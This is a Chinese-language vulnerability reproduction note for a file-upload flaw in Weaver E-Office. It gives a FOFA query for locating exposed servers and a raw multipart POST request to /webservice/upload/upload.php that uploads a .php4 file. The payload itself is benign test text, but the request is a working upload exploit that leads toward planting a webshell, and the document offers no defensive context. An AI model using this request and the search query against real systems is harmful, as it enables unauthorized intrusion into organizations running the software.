F8-14泛微-E-Office-文件上传

漏洞描述：

泛微e-office是一款功能强大的协同办公系统，旨在为企业和组织提供高效、便捷的办公环境。该系统以其智能化、平台化和全程电子化的特点，受到了众多用户的青睐。泛微e-office具备丰富的业务场景应用，可以满足人事、行政、财务、销售、运营、市场等不同部门的协作需求。通过一键导入各类表单模板、流程模板等功能，用户可以快速实现费控管理、合同管理、订单管理、项目管理等办公目标。同时，系统还提供了个性应用可视化构建的功能，用户无需代码基础，即可像搭积木一样完成新应用的构建，轻松应对各种管理场景。

网站图片:

网络测绘:

fofa语法：

app=“泛微-EOffice”

漏洞复现:

payload：

POST /webservice/upload/upload.php HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0
Accept-Encoding: gzip, deflate, br
Content-Type:multipart/form-data; boundary=--------------------------553898708333958420021355

----------------------------553898708333958420021355
Content-Disposition: form-data; name="file"; filename="qq_test.php4"
Content-Type: application/octet-stream

qqtest

效果图: